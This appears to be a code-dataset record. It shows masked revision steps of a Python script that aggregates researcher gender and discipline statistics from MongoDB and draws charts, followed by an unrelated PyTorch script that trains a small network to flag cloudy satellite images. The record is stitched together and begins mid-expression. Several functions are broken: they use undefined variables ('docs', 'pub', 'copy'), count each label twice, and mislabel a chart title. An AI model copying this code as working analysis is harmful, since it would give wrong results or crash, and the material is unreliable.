{'$exists': True}}}, {\n '$project': {'labels': 1, 'gender': 1, 'count': {'$size': '$pubs'}}}])\n d = {}\n for doc in 
docs:\n for label in doc['labels']:\n if label in d:\n d[pub['label']] = d[pub['label']] + 1\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_discipline_with_more_female():\n docs = table.aggregate([{'$match': {'gender': {'$exists': 1}}}, {\n '$unwind': '$labels'}, {'$group': {'_id': {'label': '$labels',\n 'gender': '$gender'}, 'count': {'$sum': 1}}}])\n d = {}\n for doc in docs:\n if doc['_id']['label'] in d:\n if doc['_id']['gender'] == 'M':\n d[doc['_id']['label']][0] = doc['count']\n else:\n d[doc['_id']['label']][1] = doc['count']\n else:\n d[doc['_id']['label']] = [0, 0]\n if doc['_id']['gender'] == 'M':\n d[doc['_id']['label']][0] = doc['count']\n else:\n d[doc['_id']['label']][1] = doc['count']\n count = 0\n for key in d:\n if d[key][0] != 0 and d[key][1] > d[key][0]:\n count += 1\n print('%s:' % key)\n print('male {0},female {1}'.format(d[key][0], d[key][1]))\n print('number of all:%s' % count)\n\n\ndef discipline_proportion(top_k):\n docs = table.aggregate([{'$match': {'gender': {'$exists': 1}}}, {\n '$unwind': '$labels'}, {'$group': {'_id': {'label': '$labels'},\n 'count': {'$sum': 1}}}, {'$sort': {'count': -1}}])\n docs = [doc for doc in docs]\n total = table.count({'gender': {'$exists': 1}})\n count_arr = [doc['count'] for doc in docs[:top_k]]\n proportion_arr = [(doc['count'] / total) for doc in docs[:top_k]]\n cumulative_arr = []\n c = 0\n for i in proportion_arr:\n c += i\n cumulative_arr.append(c)\n labels = [doc['_id']['label'] for doc in docs[:top_k]]\n chart = Chart(100, 150)\n chart.bar(cumulative_arr, top_k, labels,\n 'Cumulative propotion of most popular disciplines', 'discipline',\n 'propotion', True, log=False, fontsize=100)\n chart.save(chart_path + '/cumulative_{0}'.format(top_k), format='eps')\n chart.clear()\n\n\ndef gender_favorite(top_k, sex='M'):\n docs = table.aggregate([{'$match': {'gender': sex}}, {'$unwind':\n '$labels'}, {'$group': {'_id': {'label': '$labels'}, 'count': {\n '$sum': 1}}}, {'$sort': {'count': -1}}])\n number_arr = []\n count_arr = []\n labels = []\n docs = [doc for doc in docs]\n for doc in docs[:top_k]:\n count_arr.append(doc['count'])\n labels.append(doc['_id']['label'])\n chart = Chart(100, 180)\n chart.bar(count_arr, top_k, labels,\n \"The Top {0} females' favorite disciplines\".format(top_k),\n 'discipline', 'researcher number', True, log=False, fontsize=120)\n chart.save(chart_path + '/{1}_favorite_{0}'.format(top_k, sex), format=\n 'eps')\n chart.clear()\n\n\ndef average_h_index(top_k):\n all_docs = copy.aggregate([{'$match': {'gender': {'$exists': True}}}, {\n '$project': {'index': 1, 'labels': 1, 'gender': 1, 'count': {\n '$size': '$pubs'}}}])\n d = {}\n col_d = {}\n for doc in all_docs:\n for label in doc['labels']:\n if label in d:\n if doc['gender'] == 'M':\n d[label][0] += 1\n d[label][1] += int(doc['index'])\n else:\n d[label][2] += 1\n d[label][3] += int(doc['index'])\n elif doc['gender'] == 'M':\n d[label] = [1, int(doc['index']), 0, 0]\n else:\n d[label] = [0, 0, 1, int(doc['index'])]\n if label in d:\n if doc['gender'] == 'M':\n d[label][0] += 1\n d[label][1] += int(doc['index'])\n else:\n d[label][2] += 1\n d[label][3] += int(doc['index'])\n elif doc['gender'] == 'M':\n d[label] = [1, int(doc['index']), 0, 0]\n else:\n d[label] = [0, 0, 1, int(doc['index'])]\n labels = []\n arr = []\n for key in d:\n if d[key][0] > 50:\n a = d[key][1] / d[key][0]\n b = d[key][3] / d[key][2]\n if b > a:\n print(key)\n print(a)\n print(b)\n\n\ndef avarage_publication(top_k):\n all_docs = copy.aggregate([{'$match': {'gender': {'$exists': True}}}, {\n '$project': {'labels': 1, 'gender': 1, 'count': {'$size': '$pubs'}}}])\n d = {}\n for doc in 
docs:\n for label in doc['labels']:\n if label in d:\n d[pub['label']] = d[pub['label']] + 1\n\n\ndiscipline_proportion(30)\n",
"step-3": "<mask token>\ntable = db.get_researcher_copy()\nchart_path = '../charts/discipline '\n\n\ndef get_discipline_with_more_female():\n docs = table.aggregate([{'$match': {'gender': {'$exists': 1}}}, {\n '$unwind': '$labels'}, {'$group': {'_id': {'label': '$labels',\n 'gender': '$gender'}, 'count': {'$sum': 1}}}])\n d = {}\n for doc in docs:\n if doc['_id']['label'] in d:\n if doc['_id']['gender'] == 'M':\n d[doc['_id']['label']][0] = doc['count']\n else:\n d[doc['_id']['label']][1] = doc['count']\n else:\n d[doc['_id']['label']] = [0, 0]\n if doc['_id']['gender'] == 'M':\n d[doc['_id']['label']][0] = doc['count']\n else:\n d[doc['_id']['label']][1] = doc['count']\n count = 0\n for key in d:\n if d[key][0] != 0 and d[key][1] > d[key][0]:\n count += 1\n print('%s:' % key)\n print('male {0},female {1}'.format(d[key][0], d[key][1]))\n print('number of all:%s' % count)\n\n\ndef discipline_proportion(top_k):\n docs = table.aggregate([{'$match': {'gender': {'$exists': 1}}}, {\n '$unwind': '$labels'}, {'$group': {'_id': {'label': '$labels'},\n 'count': {'$sum': 1}}}, {'$sort': {'count': -1}}])\n docs = [doc for doc in docs]\n total = table.count({'gender': {'$exists': 1}})\n count_arr = [doc['count'] for doc in docs[:top_k]]\n proportion_arr = [(doc['count'] / total) for doc in docs[:top_k]]\n cumulative_arr = []\n c = 0\n for i in proportion_arr:\n c += i\n cumulative_arr.append(c)\n labels = [doc['_id']['label'] for doc in docs[:top_k]]\n chart = Chart(100, 150)\n chart.bar(cumulative_arr, top_k, labels,\n 'Cumulative propotion of most popular disciplines', 'discipline',\n 'propotion', True, log=False, fontsize=100)\n chart.save(chart_path + '/cumulative_{0}'.format(top_k), format='eps')\n chart.clear()\n\n\ndef gender_favorite(top_k, sex='M'):\n docs = table.aggregate([{'$match': {'gender': sex}}, {'$unwind':\n '$labels'}, {'$group': {'_id': {'label': '$labels'}, 'count': {\n '$sum': 1}}}, {'$sort': {'count': -1}}])\n number_arr = []\n count_arr = []\n labels = []\n docs = [doc for doc in docs]\n for doc in docs[:top_k]:\n count_arr.append(doc['count'])\n labels.append(doc['_id']['label'])\n chart = Chart(100, 180)\n chart.bar(count_arr, top_k, labels,\n \"The Top {0} females' favorite disciplines\".format(top_k),\n 'discipline', 'researcher number', True, log=False, fontsize=120)\n chart.save(chart_path + '/{1}_favorite_{0}'.format(top_k, sex), format=\n 'eps')\n chart.clear()\n\n\ndef average_h_index(top_k):\n all_docs = copy.aggregate([{'$match': {'gender': {'$exists': True}}}, {\n '$project': {'index': 1, 'labels': 1, 'gender': 1, 'count': {\n '$size': '$pubs'}}}])\n d = {}\n col_d = {}\n for doc in all_docs:\n for label in doc['labels']:\n if label in d:\n if doc['gender'] == 'M':\n d[label][0] += 1\n d[label][1] += int(doc['index'])\n else:\n d[label][2] += 1\n d[label][3] += int(doc['index'])\n elif doc['gender'] == 'M':\n d[label] = [1, int(doc['index']), 0, 0]\n else:\n d[label] = [0, 0, 1, int(doc['index'])]\n if label in d:\n if doc['gender'] == 'M':\n d[label][0] += 1\n d[label][1] += int(doc['index'])\n else:\n d[label][2] += 1\n d[label][3] += int(doc['index'])\n elif doc['gender'] == 'M':\n d[label] = [1, int(doc['index']), 0, 0]\n else:\n d[label] = [0, 0, 1, int(doc['index'])]\n labels = []\n arr = []\n for key in d:\n if d[key][0] > 50:\n a = d[key][1] / d[key][0]\n b = d[key][3] / d[key][2]\n if b > a:\n print(key)\n print(a)\n print(b)\n\n\ndef avarage_publication(top_k):\n all_docs = copy.aggregate([{'$match': {'gender': {'$exists': True}}}, {\n '$project': 
{'labels': 1, 'gender': 1, 'count': {'$size': '$pubs'}}}])\n d = {}\n for doc in docs:\n for label in doc['labels']:\n if label in d:\n d[pub['label']] = d[pub['label']] + 1\n\n\ndiscipline_proportion(30)\n",
"step-4": "import DB as db\nimport os\nfrom Chart import Chart\nimport matplotlib.pyplot as plt\nimport numpy as np\ntable = db.get_researcher_copy()\nchart_path = '../charts/discipline '\n\n\ndef get_discipline_with_more_female():\n docs = table.aggregate([{'$match': {'gender': {'$exists': 1}}}, {\n '$unwind': '$labels'}, {'$group': {'_id': {'label': '$labels',\n 'gender': '$gender'}, 'count': {'$sum': 1}}}])\n d = {}\n for doc in docs:\n if doc['_id']['label'] in d:\n if doc['_id']['gender'] == 'M':\n d[doc['_id']['label']][0] = doc['count']\n else:\n d[doc['_id']['label']][1] = doc['count']\n else:\n d[doc['_id']['label']] = [0, 0]\n if doc['_id']['gender'] == 'M':\n d[doc['_id']['label']][0] = doc['count']\n else:\n d[doc['_id']['label']][1] = doc['count']\n count = 0\n for key in d:\n if d[key][0] != 0 and d[key][1] > d[key][0]:\n count += 1\n print('%s:' % key)\n print('male {0},female {1}'.format(d[key][0], d[key][1]))\n print('number of all:%s' % count)\n\n\ndef discipline_proportion(top_k):\n docs = table.aggregate([{'$match': {'gender': {'$exists': 1}}}, {\n '$unwind': '$labels'}, {'$group': {'_id': {'label': '$labels'},\n 'count': {'$sum': 1}}}, {'$sort': {'count': -1}}])\n docs = [doc for doc in docs]\n total = table.count({'gender': {'$exists': 1}})\n count_arr = [doc['count'] for doc in docs[:top_k]]\n proportion_arr = [(doc['count'] / total) for doc in docs[:top_k]]\n cumulative_arr = []\n c = 0\n for i in proportion_arr:\n c += i\n cumulative_arr.append(c)\n labels = [doc['_id']['label'] for doc in docs[:top_k]]\n chart = Chart(100, 150)\n chart.bar(cumulative_arr, top_k, labels,\n 'Cumulative propotion of most popular disciplines', 'discipline',\n 'propotion', True, log=False, fontsize=100)\n chart.save(chart_path + '/cumulative_{0}'.format(top_k), format='eps')\n chart.clear()\n\n\ndef gender_favorite(top_k, sex='M'):\n docs = table.aggregate([{'$match': {'gender': sex}}, {'$unwind':\n '$labels'}, {'$group': {'_id': {'label': '$labels'}, 'count': {\n '$sum': 1}}}, {'$sort': {'count': -1}}])\n number_arr = []\n count_arr = []\n labels = []\n docs = [doc for doc in docs]\n for doc in docs[:top_k]:\n count_arr.append(doc['count'])\n labels.append(doc['_id']['label'])\n chart = Chart(100, 180)\n chart.bar(count_arr, top_k, labels,\n \"The Top {0} females' favorite disciplines\".format(top_k),\n 'discipline', 'researcher number', True, log=False, fontsize=120)\n chart.save(chart_path + '/{1}_favorite_{0}'.format(top_k, sex), format=\n 'eps')\n chart.clear()\n\n\ndef average_h_index(top_k):\n all_docs = copy.aggregate([{'$match': {'gender': {'$exists': True}}}, {\n '$project': {'index': 1, 'labels': 1, 'gender': 1, 'count': {\n '$size': '$pubs'}}}])\n d = {}\n col_d = {}\n for doc in all_docs:\n for label in doc['labels']:\n if label in d:\n if doc['gender'] == 'M':\n d[label][0] += 1\n d[label][1] += int(doc['index'])\n else:\n d[label][2] += 1\n d[label][3] += int(doc['index'])\n elif doc['gender'] == 'M':\n d[label] = [1, int(doc['index']), 0, 0]\n else:\n d[label] = [0, 0, 1, int(doc['index'])]\n if label in d:\n if doc['gender'] == 'M':\n d[label][0] += 1\n d[label][1] += int(doc['index'])\n else:\n d[label][2] += 1\n d[label][3] += int(doc['index'])\n elif doc['gender'] == 'M':\n d[label] = [1, int(doc['index']), 0, 0]\n else:\n d[label] = [0, 0, 1, int(doc['index'])]\n labels = []\n arr = []\n for key in d:\n if d[key][0] > 50:\n a = d[key][1] / d[key][0]\n b = d[key][3] / d[key][2]\n if b > a:\n print(key)\n print(a)\n print(b)\n\n\ndef avarage_publication(top_k):\n 
all_docs = copy.aggregate([{'$match': {'gender': {'$exists': True}}}, {\n '$project': {'labels': 1, 'gender': 1, 'count': {'$size': '$pubs'}}}])\n d = {}\n for doc in docs:\n for label in doc['labels']:\n if label in d:\n d[pub['label']] = d[pub['label']] + 1\n\n\ndiscipline_proportion(30)\n",
"step-5": "import DB as db\nimport os\nfrom Chart import Chart\nimport matplotlib.pyplot as plt\nimport numpy as np\ntable = db.get_researcher_copy()\nchart_path = '../charts/discipline '\n\n\ndef get_discipline_with_more_female():\n\tdocs = table.aggregate([\n\t\t{'$match':{'gender':{'$exists':1}}},\n\t\t{'$unwind':'$labels'},\n\t\t{'$group':{'_id':{'label':'$labels','gender':'$gender'},'count':{'$sum':1}}}\n\t\t# {'$group':{'_id':{'label':'$labels'},'male_count':{'$sum':{'$match':{'gender':'M'}}}}}\n\t\t])\n\td = {}\n\tfor doc in docs:\n\t\tif doc['_id']['label'] in d:\n\t\t\tif doc['_id']['gender'] == 'M':\n\t\t\t\td[doc['_id']['label']][0] = doc['count']\n\t\t\telse:\n\t\t\t\td[doc['_id']['label']][1] = doc['count']\n\t\telse:\n\t\t\td[doc['_id']['label']] = [0,0]\n\t\t\tif doc['_id']['gender'] == 'M':\n\t\t\t\td[doc['_id']['label']][0] = doc['count']\n\t\t\telse:\n\t\t\t\td[doc['_id']['label']][1] = doc['count']\n\n\tcount = 0\n\tfor key in d:\n\t\tif d[key][0]!=0 and d[key][1] > d[key][0]:\n\t\t\tcount+=1\n\t\t\tprint('%s:'%key)\n\t\t\tprint('male {0},female {1}'.format(d[key][0],d[key][1]))\n\tprint('number of all:%s'%count)\n\n\n\ndef discipline_proportion(top_k):\n\tdocs = table.aggregate([\n\t\t{'$match':{'gender':{'$exists':1}}},\n\t\t{'$unwind':'$labels'},\n\t\t{'$group':{\n\t\t'_id':{'label':'$labels'},\n\t\t'count':{'$sum':1}\n\t\t}},\n\t\t{'$sort':{'count':-1}}])\n\n\tdocs = [doc for doc in docs]\n\t# print(docs[:10])\n\ttotal = table.count({'gender':{'$exists':1}})\n\tcount_arr = [doc['count'] for doc in docs[:top_k]]\n\tproportion_arr = [doc['count']/total for doc in docs[:top_k]]\n\n\tcumulative_arr = []\n\tc = 0\n\tfor i in proportion_arr:\n\t\tc+=i\n\t\tcumulative_arr.append(c)\n\n\tlabels = [doc['_id']['label'] for doc in docs[:top_k]]\n\n\t# chart = Chart()\n\t# print(len(labels))\n\t# print(len(arr))\n\t# chart.pie([arr],'test',labels)\n\t# chart.show()\n\t# chart.single_unnomarlized_CDF(arr,'disciplines CDF','disciplines','percentage')\n\t# chart.save(chart_path+'cdf.eps')\n\n\t# s = ''\n\t# print(np.median())\n\t# for label in labels:\n\t# \ts = s+label+', '\n\t# print(s)\n\n\t# os.mkdir(chart_path) if not os.path.exists(chart_path) else ''\n\tchart = Chart(100,150)\n\t# chart.bar(count_arr,top_k,labels,'The Top {0} popular disciplines'.format(top_k),'discipline','researcher number',True,log=False,fontsize=100)\n\t# chart.show()\n\t# chart.save(chart_path+'/number_{0}'.format(top_k),format='eps')\n\t# chart.clear()\n\n\tchart.bar(cumulative_arr,top_k,labels,'Cumulative propotion of most popular disciplines','discipline','propotion',True,log=False,fontsize=100)\n\tchart.save(chart_path+'/cumulative_{0}'.format(top_k),format='eps')\n\tchart.clear()\n\n\t# chart = Chart(100,150)\n\t# chart.bar(proportion_arr,top_k,labels,'The propotion of researchers in top 30 disciplines','discipline','propotion',True,log=False,fontsize=100)\n\t# chart.save(chart_path+'/proportion_{0}.eps'.format(top_k))\n\t# chart.clear()\n\t\ndef gender_favorite(top_k,sex='M'):\n\tdocs = table.aggregate([\n\t\t{'$match':{'gender':sex}},\n\t\t{'$unwind':'$labels'},\n\t\t{'$group':{\n\t\t'_id':{'label':'$labels'},\n\t\t'count':{'$sum':1}\n\t\t}},\n\t\t{'$sort':{'count':-1}}])\n\tnumber_arr = []\n\tcount_arr = []\n\tlabels = []\n\tdocs = [doc for doc in docs]\n\tfor doc in docs[:top_k]:\n\t\tcount_arr.append(doc['count'])\n\t\tlabels.append(doc['_id']['label'])\n\n\tchart = Chart(100,180)\n\tchart.bar(count_arr,top_k,labels,\"The Top {0} females' favorite 
disciplines\".format(top_k),'discipline','researcher number',True,log=False,fontsize=120)\n\tchart.save(chart_path+'/{1}_favorite_{0}'.format(top_k,sex),format='eps')\n\tchart.clear()\n\ndef average_h_index(top_k):\n\tall_docs = copy.aggregate([{'$match':{'gender':{'$exists':True}}},{'$project':{'index':1,'labels':1,'gender':1,'count':{'$size':'$pubs'}}}])\n\td = {}\n\tcol_d = {}\n\tfor doc in all_docs:\n\t\tfor label in doc['labels']:\n\t\t\tif label in d:\n\t\t\t\tif doc['gender'] == 'M':\n\t\t\t\t\td[label][0]+=1\n\t\t\t\t\td[label][1]+=int(doc['index'])\n\t\t\t\telse:\n\t\t\t\t\td[label][2]+=1\n\t\t\t\t\td[label][3]+=int(doc['index'])\n\t\t\telse:\n\t\t\t\tif doc['gender'] == 'M':\n\t\t\t\t\td[label] = [1,int(doc['index']),0,0]\n\t\t\t\telse:\n\t\t\t\t\td[label] = [0,0,1,int(doc['index'])]\n\t\t\t\t\t\n\t\t\tif label in d:\n\t\t\t\tif doc['gender'] == 'M':\n\t\t\t\t\td[label][0]+=1\n\t\t\t\t\td[label][1]+=int(doc['index'])\n\t\t\t\telse:\n\t\t\t\t\td[label][2]+=1\n\t\t\t\t\td[label][3]+=int(doc['index'])\n\t\t\telse:\n\t\t\t\tif doc['gender'] == 'M':\n\t\t\t\t\td[label] = [1,int(doc['index']),0,0]\n\t\t\t\telse:\n\t\t\t\t\td[label] = [0,0,1,int(doc['index'])]\t\n\n\tlabels = []\n\tarr = []\n\n\tfor key in d:\n\t\tif d[key][0] > 50:\n\t\t\ta = d[key][1]/d[key][0]\n\t\t\tb = d[key][3]/d[key][2]\n\t\t\tif b>a:\n\t\t\t\tprint(key)\n\t\t\t\tprint(a)\n\t\t\t\tprint(b)\n\ndef avarage_publication(top_k):\n\tall_docs = copy.aggregate([{'$match':{'gender':{'$exists':True}}},{'$project':{'labels':1,'gender':1,'count':{'$size':'$pubs'}}}])\t\n\td = {}\n\tfor doc in docs:\n\t\tfor label in doc['labels']:\n\t\t\tif label in d:\n\t\t\t\td[pub['label']] = d[pub['label']]+1\n\n\n\n\n\n\n# \tarr.sort(key=lambda x:x[2],reverse=True)\n# \tarr = arr[:top_k]\n# \taverage_index_arr = []\n# \tlabels = []\n# \tfor item in arr:\n# \t\tlabels.append(item[0])\n# \t\taverage_index_arr.append(item[1])\n\n# \tchart = Chart(100,180)\n# \tchart.bar(average_index_arr,top_k,labels,'The Top {0} fields with highest average h-index'.format(top_k),'discipline','researcher number',True,log=False,fontsize=120)\n# \tchart.save(chart_path+'/top_{0}_average_disciplines'.format(top_k),format='png')\n# \tchart.clear()\t\n\n\ndiscipline_proportion(30)\n# get_discipline_with_more_female()\n# gender_favorite(30)\n# gender_favorite(30,'F')\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import cv2
import imageio
import pandas as pd
import glob, os
import numpy as np
fileDir = os.getcwd()
# os.chdir("./train-jpg")
# there are 40480 training examples
# we will allocate 39000 for training
# and the remaining 1480 will be for validation
input_size = 65536 # 256^2
hidden_size = 20
hidden_size_1 = 15
hidden_size_2 = 10
hidden_size_3 = 5
num_classes = 1
learning_rate = 0.001
num_epochs = 5
train_num = 1000
test_num = 148
# train_num = 39000
# test_num = 1480
# %% Load data--for clouds and non-clouds
images = []
for file in glob.glob("*.jpg"):
images.append(file)
images = sorted(images, key=lambda filename: int(filename[6: -4])) # string splicing so that the images are in order
train_images = []
test_images = []
train_labels = []
test_labels = []
labels = pd.read_csv("./train_v2.csv") # labels are whether or not image is any sort of cloudy or haze
for i in range(train_num + test_num):
tags = labels.iloc[i]["tags"]
if i < train_num:
train_images.append(imageio.imread(images[i], as_gray=True).flatten())
train_labels.append(int("cloudy" not in tags and "haze" not in tags))
# train_labels.append(int("water" not in tags))
else:
test_images.append(imageio.imread(images[i], as_gray=True).flatten())
test_labels.append(int("cloudy" not in tags and "haze" not in tags))
# test_labels.append(int("water" not in tags))
class Net(nn.Module):
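    # Fully connected classifier: 65536 -> 20 -> 15 -> 10 -> 5 -> 1, with a sigmoid
    # after every layer; the final output is the probability that the image is
    # labeled 1 (i.e. free of clouds and haze).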
def __init__(self, input_size, hidden_size, num_classes):
super(Net, self).__init__()
# parameters
# weights
# self.h1 = nn.Sigmoid() # input_size, hidden_size
# self.o = nn.Sigmoid() # hidden_size, num_classes
self.h1 = nn.Linear(input_size, hidden_size)
self.h2 = nn.Linear(hidden_size, hidden_size_1)
self.h3 = nn.Linear(hidden_size_1, hidden_size_2)
self.h4 = nn.Linear(hidden_size_2, hidden_size_3)
self.o = nn.Linear(hidden_size_3, num_classes)
def forward(self, x):
x = torch.sigmoid(self.h1(x))
# print("doing x: {}".format(x.shape))
x = torch.sigmoid(self.h2(x))
x = torch.sigmoid(self.h3(x))
x = torch.sigmoid(self.h4(x))
x = torch.sigmoid(self.o(x))
return x
# %%
model = Net(input_size, hidden_size, num_classes) # no device configuration here
criterion = nn.BCELoss()  # outputs are sigmoid probabilities and labels are 0/1, so binary cross-entropy fits (SoftMarginLoss expects -1/+1 targets)
optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)
# model = TheModelClass(*args, **kwargs)
# model.load_state_dict(torch.load("model.ckpt"))
# model.eval()
# optimizer = TheOptimizerClass(*args, **kwargs)
# checkpoint = torch.load('./model.ckpt')
# model.load_state_dict(checkpoint['model_state_dict'])
# optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
# epoch = checkpoint['epoch']
# loss = checkpoint['loss']
total_step = len(train_images)
for epoch in range(num_epochs):
for i, image in enumerate(train_images):
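        # Train on one example at a time (batch size 1); each flattened 256x256
        # grayscale image becomes a 1 x 65536 input row.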
image = torch.Tensor(train_images[i]).reshape(1, 65536)
label = torch.Tensor([int(train_labels[i])])
# label = label.long()
# label = label.reshape(1,1)
# label = label.squeeze()
# Forward pass
outputs = model(image)
outputs = outputs.squeeze(0)
# outputs.reshape(1,)
loss = criterion(outputs, label)
# Backward and optimize
optimizer.zero_grad()
loss.backward()
optimizer.step()
if (i+1) % 100 == 0:
print ('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}'
.format(epoch+1, num_epochs, i+1, total_step, loss.item()))
# %%
with torch.no_grad():
correct = 0
total = 0
for i, image in enumerate(test_images):
image = torch.Tensor(test_images[i]).reshape(1, 65536)
label = torch.Tensor([int(test_labels[i])])
outputs = model(image)
outputs = outputs.squeeze(0)
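        # Threshold the sigmoid output at 0.5 to get a hard 0/1 prediction.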
outputs = 1 if torch.sum(outputs) >= 0.5 else 0
if outputs == torch.sum(label):
correct += 1
elif outputs == 0:
print("#############")
print(i,outputs, torch.sum(label))
# _, predicted = torch.max(outputs.data, 1)
# correct += (predicted == labels).sum().item()
print('Accuracy of the network on the {} test images: {} %'.format(len(test_images), 100 * correct / len(test_images)))
# %%
torch.save(model.state_dict(), 'model.ckpt')
# %%
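# A minimal sketch (not part of the original script): reloading the saved weights
# into a fresh model for later inference; `eval_model` is a name introduced here
# purely for illustration.
eval_model = Net(input_size, hidden_size, num_classes)
eval_model.load_state_dict(torch.load('model.ckpt'))
eval_model.eval()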
|
normal
|
{
"blob_id": "a4deb67d277538e61c32381da0fe4886016dae33",
"index": 85,
"step-1": "<mask token>\n\n\nclass Net(nn.Module):\n\n def __init__(self, input_size, hidden_size, num_classes):\n super(Net, self).__init__()\n self.h1 = nn.Linear(input_size, hidden_size)\n self.h2 = nn.Linear(hidden_size, hidden_size_1)\n self.h3 = nn.Linear(hidden_size_1, hidden_size_2)\n self.h4 = nn.Linear(hidden_size_2, hidden_size_3)\n self.o = nn.Linear(hidden_size_3, num_classes)\n\n def forward(self, x):\n x = torch.sigmoid(self.h1(x))\n x = torch.sigmoid(self.h2(x))\n x = torch.sigmoid(self.h3(x))\n x = torch.sigmoid(self.h4(x))\n x = torch.sigmoid(self.o(x))\n return x\n\n\n<mask token>\n",
"step-2": "<mask token>\nfor file in glob.glob('*.jpg'):\n images.append(file)\n<mask token>\nfor i in range(train_num + test_num):\n tags = labels.iloc[i]['tags']\n if i < train_num:\n train_images.append(imageio.imread(images[i], as_gray=True).flatten())\n train_labels.append(int('cloudy' not in tags and 'haze' not in tags))\n else:\n test_images.append(imageio.imread(images[i], as_gray=True).flatten())\n test_labels.append(int('cloudy' not in tags and 'haze' not in tags))\n\n\nclass Net(nn.Module):\n\n def __init__(self, input_size, hidden_size, num_classes):\n super(Net, self).__init__()\n self.h1 = nn.Linear(input_size, hidden_size)\n self.h2 = nn.Linear(hidden_size, hidden_size_1)\n self.h3 = nn.Linear(hidden_size_1, hidden_size_2)\n self.h4 = nn.Linear(hidden_size_2, hidden_size_3)\n self.o = nn.Linear(hidden_size_3, num_classes)\n\n def forward(self, x):\n x = torch.sigmoid(self.h1(x))\n x = torch.sigmoid(self.h2(x))\n x = torch.sigmoid(self.h3(x))\n x = torch.sigmoid(self.h4(x))\n x = torch.sigmoid(self.o(x))\n return x\n\n\n<mask token>\nfor epoch in range(num_epochs):\n for i, image in enumerate(train_images):\n image = torch.Tensor(train_images[i]).reshape(1, 65536)\n label = torch.Tensor([int(train_labels[i])])\n outputs = model(image)\n outputs = outputs.squeeze(0)\n loss = criterion(outputs, label)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n if (i + 1) % 100 == 0:\n print('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}'.format(epoch +\n 1, num_epochs, i + 1, total_step, loss.item()))\nwith torch.no_grad():\n correct = 0\n total = 0\n for i, image in enumerate(test_images):\n image = torch.Tensor(test_images[i]).reshape(1, 65536)\n label = torch.Tensor([int(test_labels[i])])\n outputs = model(image)\n outputs = outputs.squeeze(0)\n outputs = 1 if torch.sum(outputs) >= 0.5 else 0\n if outputs == torch.sum(label):\n correct += 1\n elif outputs == 0:\n print('#############')\n print(i, outputs, torch.sum(label))\n print('Accuracy of the network on the {} test images: {} %'.format(len(\n test_images), 100 * correct / len(test_images)))\ntorch.save(model.state_dict(), 'model.ckpt')\n",
"step-3": "<mask token>\nfileDir = os.getcwd()\ninput_size = 65536\nhidden_size = 20\nhidden_size_1 = 15\nhidden_size_2 = 10\nhidden_size_3 = 5\nnum_classes = 1\nlearning_rate = 0.001\nnum_epochs = 5\ntrain_num = 1000\ntest_num = 148\nimages = []\nfor file in glob.glob('*.jpg'):\n images.append(file)\nimages = sorted(images, key=lambda filename: int(filename[6:-4]))\ntrain_images = []\ntest_images = []\ntrain_labels = []\ntest_labels = []\nlabels = pd.read_csv('./train_v2.csv')\nfor i in range(train_num + test_num):\n tags = labels.iloc[i]['tags']\n if i < train_num:\n train_images.append(imageio.imread(images[i], as_gray=True).flatten())\n train_labels.append(int('cloudy' not in tags and 'haze' not in tags))\n else:\n test_images.append(imageio.imread(images[i], as_gray=True).flatten())\n test_labels.append(int('cloudy' not in tags and 'haze' not in tags))\n\n\nclass Net(nn.Module):\n\n def __init__(self, input_size, hidden_size, num_classes):\n super(Net, self).__init__()\n self.h1 = nn.Linear(input_size, hidden_size)\n self.h2 = nn.Linear(hidden_size, hidden_size_1)\n self.h3 = nn.Linear(hidden_size_1, hidden_size_2)\n self.h4 = nn.Linear(hidden_size_2, hidden_size_3)\n self.o = nn.Linear(hidden_size_3, num_classes)\n\n def forward(self, x):\n x = torch.sigmoid(self.h1(x))\n x = torch.sigmoid(self.h2(x))\n x = torch.sigmoid(self.h3(x))\n x = torch.sigmoid(self.h4(x))\n x = torch.sigmoid(self.o(x))\n return x\n\n\nmodel = Net(input_size, hidden_size, num_classes)\ncriterion = nn.SoftMarginLoss()\noptimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\ntotal_step = len(train_images)\nfor epoch in range(num_epochs):\n for i, image in enumerate(train_images):\n image = torch.Tensor(train_images[i]).reshape(1, 65536)\n label = torch.Tensor([int(train_labels[i])])\n outputs = model(image)\n outputs = outputs.squeeze(0)\n loss = criterion(outputs, label)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n if (i + 1) % 100 == 0:\n print('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}'.format(epoch +\n 1, num_epochs, i + 1, total_step, loss.item()))\nwith torch.no_grad():\n correct = 0\n total = 0\n for i, image in enumerate(test_images):\n image = torch.Tensor(test_images[i]).reshape(1, 65536)\n label = torch.Tensor([int(test_labels[i])])\n outputs = model(image)\n outputs = outputs.squeeze(0)\n outputs = 1 if torch.sum(outputs) >= 0.5 else 0\n if outputs == torch.sum(label):\n correct += 1\n elif outputs == 0:\n print('#############')\n print(i, outputs, torch.sum(label))\n print('Accuracy of the network on the {} test images: {} %'.format(len(\n test_images), 100 * correct / len(test_images)))\ntorch.save(model.state_dict(), 'model.ckpt')\n",
"step-4": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport cv2\nimport imageio\nimport pandas as pd\nimport glob, os\nimport numpy as np\nfileDir = os.getcwd()\ninput_size = 65536\nhidden_size = 20\nhidden_size_1 = 15\nhidden_size_2 = 10\nhidden_size_3 = 5\nnum_classes = 1\nlearning_rate = 0.001\nnum_epochs = 5\ntrain_num = 1000\ntest_num = 148\nimages = []\nfor file in glob.glob('*.jpg'):\n images.append(file)\nimages = sorted(images, key=lambda filename: int(filename[6:-4]))\ntrain_images = []\ntest_images = []\ntrain_labels = []\ntest_labels = []\nlabels = pd.read_csv('./train_v2.csv')\nfor i in range(train_num + test_num):\n tags = labels.iloc[i]['tags']\n if i < train_num:\n train_images.append(imageio.imread(images[i], as_gray=True).flatten())\n train_labels.append(int('cloudy' not in tags and 'haze' not in tags))\n else:\n test_images.append(imageio.imread(images[i], as_gray=True).flatten())\n test_labels.append(int('cloudy' not in tags and 'haze' not in tags))\n\n\nclass Net(nn.Module):\n\n def __init__(self, input_size, hidden_size, num_classes):\n super(Net, self).__init__()\n self.h1 = nn.Linear(input_size, hidden_size)\n self.h2 = nn.Linear(hidden_size, 